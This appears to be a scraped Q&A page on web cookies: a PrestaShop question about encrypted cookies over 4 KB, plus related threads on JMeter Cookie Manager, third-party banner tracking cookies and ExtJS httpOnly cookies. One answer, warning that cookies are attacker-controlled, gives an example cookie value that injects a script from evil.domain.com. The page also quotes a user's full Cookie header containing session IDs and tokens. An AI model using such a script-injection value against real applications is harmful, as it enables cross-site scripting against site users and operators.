prestashop cookies exceed 4ko - cookies

I have a problem with a prestashop project.
prestashop creates cookie that exceed the maximum size authorized (4ko)
I have no idea which module or controller or something create that cookie.
Can you help me to make these cookies smaller or find which controller created these?
Cookie: cp-popup-last-displayed=1662364477; axeptio_cookies={%22$$token%22:%22borew4apbudam6j1zuean%22%2C%22$$date%22:%222022-05-05T07:44:01.399Z%22%2C%22$$completed%22:true%2C%22google_analytics%22:true%2C%22Google_Ads%22:true%2C%22GoogleRemarketing%22:true%2C%22facebook_pixel%22:true%2C%22SendinBlue%22:true}; axeptio_authorized_vendors=%2Cgoogle_analytics%2CGoogle_Ads%2CGoogleRemarketing%2Cfacebook_pixel%2CSendinBlue%2C; axeptio_all_vendors=%2Cgoogle_analytics%2CGoogle_Ads%2CGoogleRemarketing%2Cfacebook_pixel%2CSendinBlue%2C; PrestaShop-d354edfaf436c62a4b18afdcf0ba8174=def50200037b619c0f48c9bbe9df1ef54df14feddd5b02b2da0fca4ac01f3f6f914c5a09976366a5f85290dc5ab81a5a1d5cea42fe8febec03b3b5add5f7886c9f248d93262d3417cb06c0c72bf1bd6d6f618793ba9e8ce72ec073ac37b4a03d0948348680517e6fa8e8356e0651295849031d830d259edbc91f938374520f1ecec10e3c55b3d06bb02800a1aecf2cb4b25e0ed6d30c8335af50d973eb108e59381f609e00b06225889067b32eb204f4baa1da510eb726e35b3d905228373faefb2576259511e6f9a18036652bcd11057c9d3a94e203fbf332cee90403cde93c8ab92de56451a97c1f9f9095e7f9272bffbe0271bd6a7dab673bcf8a11b4db326e1f81089eb928e1737e5ea197c5dbf29aaf48271254461fe1d45b29bcf1f88162084230b42a1904de56b0d4f706500a1b51cd4d7ecdf9253ab5389bbf4d239bafc3b656e626e023a0bd00a0f310e862bd4679616b2c27380aeb09a6909b7e5f35020ca7b2d176f3d54d33f70bcde04446e2e6f115733cab9ed8ff6deae795b3eff5794d625bba6938a8d6a6346b9a3a5ac5776995b848a6dab478ba8905099310499ab58b49b552d874bc15e4619fcd4585525ab59aec7808e94db85e42e04f2504ba22460bda6f025de226e375b7857075bb11d66d05e6d8ec8973aeac9fe1b365c8d22a4a2f77d365f594ae741b4b64f76ddeb908488a7d2bd92f33e455c8568ba5485aa49eb60efc900ed43a581b38745e0316691667e31ca1a1af77175b8e6d0cf8ef9cd3ce3b1e7b4d54663b22c47ad62830d61cee15bd014d528653ff2e2817fecd44a684d7644d70f4ec655469a17a1ab4922127f1e8a415efc06de2a243629e83387f93840edc380a2ca27e96fe7a4ac35c15230b451bb9292671d5592bde1d41f19db1bcae56a746d381ae2c9aa8bb60689f59815edd7a5bcdd660e1bad20d2faba09ec5da28d41d34b0d36aea05af5983e35c0698076c1f1c77d3aab09213631b352d6a96b013eeba9cea8dfb86698ca6694c0e5d5b3d571522b655b5d723d9478e809eee94a31cb2da50f171d2f324e83ee45e525f3ba35c8daffc129cf9619941f5db45e3441fdb269e38f1b183dc6ccac57da33355e0402b9f35c5d7dd98863c46e3aa84e9845a05d655894de821657a96251c446c307a1895afef9cce39ac32a86a9f20b88215d3e9566ddf3857a04fb0d5956ce3ab2e8d0f2aec0527d8533d581a4208109a64d4349867a7059c3b6f0b932da84b260131d56086b8517c870d7521f9dad6368488ada79f28d44e27f672ca752f635bff12d962440223023cc775217aea8224c97212cb740c69d4bc297db262590d9c1b64e78cfa0441dd19b4c1af52dbf8c3d00e7f550b43ae37458e5c1e618992ddcc84cec86a83dc24e4ac85217aa33908724e3bf91e6e2c858b234865733f6ca26cc243ac4bb5e64c16f913536bbd6c027b47d21984616d4ea3b7fca4a759c5fb80f8ac7dc42b5544aa3b4f18e0730bb23849b2a2e6311c56d3ba47f7ff009742c77a86be4399c13e53fa6c81aa7b850e077ad35fb5956873290a6baf117bf7664f89d052af42ef00a7b9eda813593957b3ad24ba9b3c93f1181b7ba690f8a84e3569b472c77ce9a55dd4695372b1ace2e512468ba486072c5f6a07933d145ecad542ce255bc2850e62d531358bc96015f4a3bd708c27e0a918af508298628bbff566403f0785145958f1fdd490d0a356034b71c305a27da3f1316cf5f9516c0006f02bd8b52906f45f5794f20483be4e244adc3a80f8c2efa086e8604369b80c273acc53214b9ebf4ef64161e316a8efdc1bc5d5ab99a01a54261943bf673d821e89f9090f18b557c5b0a2bcd05e01cb9070c31cccb412c6599cbcec96bed2d32a0ee83a6fce774a41c76581b5c8204a65d6baf7491a74dc15b75b4ee2e7cf749afccb53659e1f3c60646fbf3aaf2bac3c08a0cce15ce9b8d48b2bb5de7b349c265840d1c85b037c38490b8b6e808a2e4619a1c745af2780e539c7a70ee3e9ecdba7f2f0e03160df2d46c8fad58df6bf38b77cce9645251e3de3ee065a01a85ae55ffe13e60b9a01b564e112c9c04114d6b443bf19d4ddaa8fa32033d38f93991d9fad5b14e3bb5fc15e3feddfa2498ace541e2740abc3953d6b75dde3353c51c9381a9f3a1291e98790846c2b12fb3f9385ea54598ae5bc6eba04ffd912a7d92f96555283970af4a059ee2f07461690ffffae803a2db4cfb20d7e45083a68fc05866a228684bf44223115a9c7dbe7399fe3fa8a78223c986fb6f5cf5072bc05d4a7dbf737f9e7710e46eb8169b84e8e2263317722e32bd2c4a83374f52cc587d360d346e61b44065204578c6c437823b15f3debda8a7fc0cc892572a2874a39fe512aa7070706a2fb55cbf99201a2ae497b0db8fc3689b74fcd30159f2058615469cd806a8c0ac844667ed8e3e6416050922b03267ad0f299f459532ba68a83264cf892490125117f9b87b658f71d45f848c5410382d741414e79ade6fe76d119a3154e3328fb2b718843ead84aaa05782a253f5505fc7594651d7cec185db9977557737457f3a1ca47ded851cfa197e0f166cdbb6be355eefe4fa51f51bd739978c572e20d260f1ac12c84f80adc687c07a4e8b3b71f85157f50aa76e63b7b4b6da7d740803bf0ec; PHPSESSID=8oeegu4ns8ok86aef2jachr6ml; cp-popup-61=1662364312; cp-popup-63=1662364477; PrestaShop-1875e1269d17c82b34ad3c945ac1416b=def5020083410fcc06100fa0c68af8872e5b28e51d69a3292cd674097c05d91dc4827e2c0219ed776dbc3593f528c3661982864e828f5517abf7e44fc8983a858424916eb151ecc75b32fe8fe56ebb5ad2ef8f49e4d8c946c59d99c0bf72d257b49b12b53270cf2445c69ba717249fca06c1f25d6023574246a1ce0c9de0f0e92fb18362eb7eab4974b9060c6941db0e535b9f872ae7612d4ed0fcc1e34673b585e991f65734367b87b0d2a1a7883471446a60519f4412a5efcd50794b67ce9deb437315fa02c121f12ecfe5010d8cab908ce9c1c1ee0609f2364bea2d266eb9bdd62c9b1334c7931192629656fa240964b84810c08511fb31c01ad2f925631717828540db31671c54d3c5199e57c1f048b8824916239c3736e170c724367eaed5cd0341c9e20c401243d176e9fd2c3ec3cb0027cf2aeedcb7c4411df63899ed6457678ef55bd5ee92ea023fff25179a82db5b666dd78086decd655c0c2a3549cf62b7b316c9415a543a99e0857f31c10fbaa31f7e213698e1fea87bcbefb0bcd65258fe542223f0e405d2e8d36fe06e15b7960db99dd64ce420ab23e00e257f4296a2b48b1f9ed929ed3e46f38c9322ab7ce2187a7edf4f43c963c83cd905a15ffb13174e92ce3d4f03f18bb90b8084bd18d0666e41d3f62a9bc64985f4ff1f9a05bd57bb139de12fcd851cc1ffb13cefcbf1

Prestashop Cookie is being encrypted when sent to client
(see your PrestaShop-d354edfaf436c62a4b18afdcf0ba8174=def50200037b619c0f4...
is the whole encypted cookie content)
You'll have to debug this "server side" by checking the Cookie.php class and dumping the $cookie object in the _setcookie() method
before it getting encrypted.

It is probably because of the Last viewed module. This product stores too many modules inside the Cookie. Do you use this module?

Related

JMeter 5.4.1 Cookie Manager - User-Defined Cookie not added to request's cookies

Firstly, I did add the line CookieManager.check.cookies=false to jmeter.properties.
What I'm Trying to Do
I want to add a cookie to a request's existing cookies.
For example, I see the request has [edited]:
Cookie Data:
c1=sfasfsfsfsfs; c2=erqwerqwrr; c3=poiuopiupoi
Expected Results
I would like it to have:
Cookie Data:
c1=sfasfsfsfsfs; c2=erqwerqwrr; c3=poiuopiupoi; partner=favicon.ico
Here is what I tried:
BASE_URL_2 is a variable defined in the form qa.company.com.
Actual Results
Whatever I have tried so far has not made any change in the cookies.
What else shall I try?
Underlying Motivation
Recorded a Web session and played it back.
Added a RegEx Extractor to pull out a token and then added it to subsequent requests. That helped.
However, certain requests failed with an custom application exception Security violation, please refresh.
Probably session login state is not being passed, so the website thinks the call is "stale".
I've seen this on the GUI when the session expires and you try to click a button on the site.
On comparing the cookies seem in JMeter with what I saw in the Chrome Debugger, it was clear that there were more cookies in the running application than what I had in JMeter.
Are you sure you're using HTTPS protocol because if you have secure flag and using HTTP protocol - the cookie will not be sent.
Also remove = from partner= otherwise you will end up with partner==favicon.ico
Demo:
More information:
Using HTTP cookies
HTTP Cookie Manager Advanced Usage - A Guide

Storing the value of cookie in variable but doesn't appear in cookie data in request body in Jmeter

There are lots of cookies present and I need to extract those cookie and pass them as a post parameter in further request. So i have changed the setting for them in jmeter.property file as
save.cookies=true
check.cookies=false
Then after running the test, I got those cookie value in debug sampler as ${COOKIE_}
EXPECTED:
GET data:
Cookie Data:
private_content_version=e17f5f6a5ed9557378a6f85fa2202c0e;form_key=mCPI56sUAl6bqAJdqq;
Actual Result
GET data:
[no cookies]
I have passed in the value in HTTP header manager as
name=private_content_version
Value=${COOKIE_private_content_version}
name=form_key
Value=${COOKIE_Form_key}
But instead of value, same variable is passed as ${COOKIE_private_content_version}
Also there are multiple cookies and I need to fetch them too and pass them in further http request payload,but unable to do that.What I AM MISSING?Please help
DO I NEED TO ADD THEM COOKIE MANAGER UNDER EACH OF THE HTTP REQUEST?OR DEFINED IN GLOBALLY?
Also how to define them ?
You don't need to manually add cookies in the HTTP Header Manager, the Cookie Manager should normally handle them.
If for some reason you need to build Cookie header manually make sure to use strict Cookie name and in the value one or more name/value pairs of cookies separated by semicolons
You might find HTTP Cookie Manager Advanced Usage - A Guide article useful, it contains comprehensive information on HTTP Cookie Manager configuration and troubleshooting.

Can I set a cookie in this situation?

I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Cookie Manager of Apache JMeter doesn't add the cookie to POST request

I build up very simple test plan.
Login: POST, a session cookie is returned.
Get the state: GET, a user state is returned.
Create a resource: POST, JSON body is supplied for the resource.
So my 'Test Plan' looks like:
Test Plan
Thread Group
HTTP Request Defaults
HTTP Cookie Manager
Login (HTTP Request Sampler: POST)
Get State (HTTP Request Sampler: GET)
Create Resource (HTTP Request Sampler: POST)
The cookie generated by 'Login' is added to 'Get State' correctly.
But 'Create Resource' has NO cookie. I changed their order but it doesn't help.
I used the default options firstly and changed some options but it also doesn't help.
Is it a bug of JMeter? or just POST http request is not able to have cookie?
Please give me any advice.
[SOLVED]
I noticed that it is related to the path, not the method.
You'd like to look at the domain of the cookie as well as the path.
I mean, the path and the domain of a cookie could be defined in the server side through Set-Cookie header.
Another solution is to set CookieManager.check.cookies=false in jmeter.properties usually sitting besides the jmeter startup script in bin.
JMeter for some reasons thinks that you can't set the path=/something in a cookie if you are on http:/somesite/somethingelse. That is the path has to match the path your currently on.
I've never seen a browser enforce this limitation if it actually exists. I've seen and written several sites that use this technique to set a secure cookie and then forward someone say to /admin.
I wish this option was at least in the GUI so I didn't have to change the properties file. I think BlazeMeter is smart enough to turn off checking where flood.io is not. If it were up to me I'd just remove the code that checks this entirely. Why make the load tester any harder then it needs to be.
I had this turned on in my Spring Boot server which was causing the issue with CookieManager in jMeter:
server.servlet.session.cookie.secure=true
Removing this made the cookies flow ! Of course this is for localhost. For Production you may need this turned on.

ExtJS 4.0 cannot read connect.sid from cookie

I try do develop a web application with ExtJs 4.0.
On startup the application sends a request to a server. This server sends a response. The responses' header contains Set-Cookie:"connect.sid=foobar"
When I look into the preferences of my browser, I can see that the cookie was created correctly.
My problem is that somehow I cannot access this cookie in my ExtJs application and I don't know why.
I tried to retrieve it with the following methods:
document.cookie.split(";")[0]
Ext.state.Manager.get("connect.sid"); => of course I initialized the state manager with a cookie provider
Ext.util.Cookies.get("connect.sid");
No matter which method I use, I get always undefined as return value
I hope somebody can help me, because I really don't understand why it does not work.
Thanks in advance.
Finally I found the problem.
The httpOnly flag was set in the response header. Therefore the cookie was not accessible for java script.